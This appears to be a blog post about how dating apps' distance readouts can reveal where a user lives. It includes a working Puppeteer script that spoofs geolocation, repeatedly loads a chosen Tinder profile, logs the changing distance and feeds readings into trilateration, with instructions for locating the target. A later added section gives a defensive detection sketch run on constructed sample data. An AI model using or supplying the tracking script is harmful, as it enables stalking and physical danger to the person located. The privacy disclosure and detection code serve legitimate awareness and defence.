Typical dating apps let you specify a location, so you can look for people near you. You can specify the “range” of how far you want to look for them. Most importantly, these apps show you the distance to the person you want to chat with. And this poses a security risk. Not a computer security risk, but a physical one.
First, just by seeing the distance down to miles, you can tell whether the person is at “home” or has moved somewhere else – be it a workplace, a family hometown, or anywhere else. And if you know the person’s private life (like where they are from, etc.), you can say where they are just by seeing a very imprecise distance, like 1 mile versus 150 miles.
Second, dating apps report distance quite precisely. For instance, Tinder used to report the distance down to 100 feet. They changed it to 1 mile, exactly due to privacy concerns. However, this doesn’t solve the issue. Given enough time, you can just roam around the town and measure the reported distance. Even if it says “1 mile” vs “2 miles”, you can still approximate the whereabouts. This is actually even easier if you use extensions to spoof your browser’s location, for instance Location Guard. You change your location to various different points, then you triangulate the location with KML or Radius Around Point or something similar. The more points you have, the more precise the location you get. That’s with the assumption that the person you’re tracking doesn’t move, which is a reasonable assumption every night.
Obviously, this method won’t give you an apartment number, or even a 100% precise location in a congested city. However, it’ll be more than enough when we’re talking suburbs.
How hard is it? Let’s try the following puppeteer script against Tinder:
```javascript
var startingLong = 123;
var startingLat = 456;
var shouldRandomizeAgain = false;
var latOffset = 0;
var longOffset = 0;
var lastResponse = "";

while (true) {
  // Pick a new random offset only after the last position produced a new reading
  if (shouldRandomizeAgain) {
    latOffset = Math.random() * 3;
    longOffset = Math.random() * 3;
    shouldRandomizeAgain = false;
  }
  try {
    browser = await puppeteer.launch({userDataDir: "datadir"});
    const page = await browser.newPage();
    var client = await page.target().createCDPSession();
    // Override the location the browser reports to the site
    await client.send('Emulation.setGeolocationOverride', {
      accuracy: 100,
      latitude: startingLat + latOffset,
      longitude: startingLong + longOffset,
    });
    await page.goto("https://tinder.com/app/messages/id_of_the_profile_you_want_to_track/profile");
    await page.setGeolocation({latitude: startingLat + latOffset, longitude: startingLong + longOffset});
    // Read the distance text shown on the profile
    var distance = await page.evaluate(() => document.getElementsByClassName("C($c-ds-text-secondary)")[1].innerText);
    // Log the reading only when the reported distance has changed
    if (distance != lastResponse && distance.indexOf("away") > 0) {
      console.log({
        longitude: startingLong + longOffset,
        latitude: startingLat + latOffset,
        distance: distance
      });
      lastResponse = distance;
      shouldRandomizeAgain = true;
    }
    await browser.close();
  } catch (e) {
    console.log(e);
  }
}
```
Let it run for a while, like 20-30 minutes. It should print something similar to:
```
{
  longitude: 123,
  latitude: 456,
  distance: '789 kilometers away'
}
{
  longitude: 321,
  latitude: 654,
  distance: '987 kilometers away'
}
{
  longitude: 111,
  latitude: 222,
  distance: '333 kilometers away'
}
```
You can probably ignore your first reading because Tinder doesn’t refresh your location immediately. Once you have a couple of readings, you can go to Radius Around Point and draw some circles. Note that you can draw multiple circles over one map (just change the values in the inputs, and click “Draw” again). The more readings you get, the more precise your result is.
So how can we protect against that? The only solution seems to be hiding the feature. You should disable the option to report your location to other users, so they won’t be able to see it. Obviously, this may not be included in the free plan of the app you use.
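On the service side, the script above leaves a recognizable trace: one viewer re-opening the same profile from positions that jump by up to a few degrees within minutes. The following is an added detection example, not code from the original post or from any app; the event fields (`viewer`, `profile`, `ts`, `lat`, `lon`), the thresholds and the sample log are assumptions constructed for illustration.

```javascript
// Added example: server-side detection sketch. Field names and thresholds are assumptions.
const EARTH_RADIUS_KM = 6371;

// Great-circle distance between two {lat, lon} points, in kilometres.
function haversineKm(a, b) {
  const rad = (d) => (d * Math.PI) / 180;
  const dLat = rad(b.lat - a.lat);
  const dLon = rad(b.lon - a.lon);
  const h = Math.sin(dLat / 2) ** 2 +
    Math.cos(rad(a.lat)) * Math.cos(rad(b.lat)) * Math.sin(dLon / 2) ** 2;
  return 2 * EARTH_RADIUS_KM * Math.asin(Math.sqrt(h));
}

// Flag (viewer, profile) pairs where the viewer's reported position moves
// faster than maxKmh between consecutive views at least minJumps times.
function flagProbing(events, { maxKmh = 1000, minJumps = 3 } = {}) {
  const groups = new Map();
  for (const e of events) {
    const key = `${e.viewer}|${e.profile}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  const flagged = [];
  for (const views of groups.values()) {
    views.sort((x, y) => x.ts - y.ts);
    let jumps = 0;
    for (let i = 1; i < views.length; i++) {
      const hours = Math.max(views[i].ts - views[i - 1].ts, 1) / 3600;
      if (haversineKm(views[i - 1], views[i]) / hours > maxKmh) jumps++;
    }
    if (jumps >= minJumps) {
      flagged.push({ viewer: views[0].viewer, profile: views[0].profile, jumps });
    }
  }
  return flagged;
}

// Constructed sample log (ts in seconds); not real data.
const sampleLog = [
  { viewer: 'v1', profile: 'p9', ts: 0, lat: 50.0, lon: 14.0 },
  { viewer: 'v1', profile: 'p9', ts: 120, lat: 51.8, lon: 16.2 },
  { viewer: 'v1', profile: 'p9', ts: 240, lat: 50.4, lon: 15.1 },
  { viewer: 'v1', profile: 'p9', ts: 360, lat: 52.6, lon: 14.9 },
  { viewer: 'v2', profile: 'p9', ts: 0, lat: 50.0, lon: 14.0 },
  { viewer: 'v2', profile: 'p9', ts: 18000, lat: 52.5, lon: 13.4 },
  { viewer: 'v3', profile: 'p9', ts: 10, lat: 50.0, lon: 14.0 },
  { viewer: 'v3', profile: 'p9', ts: 70, lat: 50.01, lon: 14.01 },
];
console.log(flagProbing(sampleLog));
```

Only `v1` is flagged: `v2` covers a similar distance over five hours, and `v3` moves about a kilometre in a minute, both of which are plausible travel.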